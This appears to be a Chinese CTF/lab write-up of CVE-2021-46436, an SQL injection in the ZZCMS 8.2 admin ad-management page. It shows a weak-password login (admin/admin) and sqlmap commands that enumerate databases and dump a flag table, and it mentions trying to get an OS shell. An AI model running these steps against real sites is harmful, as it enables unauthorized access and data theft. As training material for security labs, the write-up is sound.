CVE-2021-46436

CVE-2021-46436

靶标介绍:

站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.2中在admin/ad_manage.php存在sql注入漏洞

得到目标后根据已知的

直接访问网址:http://xxx/admin/ad_manage.php ,跳转到登录窗口,弱口令:admin/admin 登录成功
在这里插入图片描述

继续访问:http://xxx/admin/ad_manage.php 网址,测试了添加广告和查询的功能,发现查询这里有输入参数,最可能存在SQL注入。因此我们直接随便输入值后进行抓包。
在这里插入图片描述

抓包后如图,将抓包的内容保存为1.txt 用sqlmap 跑出来即可
在这里插入图片描述

Sqlmap:

sqlmap.py -r 1.txt --random-agent --batch

在这里插入图片描述

可以尝试 --os-shellsql-shell 发现 --os-shell 没有写入的权限,因此我们拿不到webshell,所以flag 大概率会在数据库中,因此先查下数据库

sqlmap.py -r 1.txt --random-agent --batch --dbs

在这里插入图片描述

不存在ctf数据库,拿可能是在zzcms 当中,所以继续查看,这里已经跑出flag,确定flag 是再zzcms 当中,所以运行第二个把flag导出。这次的这个注入跑出来是延时注入,应该是一个个字符跑出来的,所以会比较慢。

sqlmap.py -r 1.txt --random-agent --batch -D zzcms --tables
sqlmap.py -r 1.txt --random-agent --batch -D zzcms -T flag --dump

在这里插入图片描述
最终跑出来的flag
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值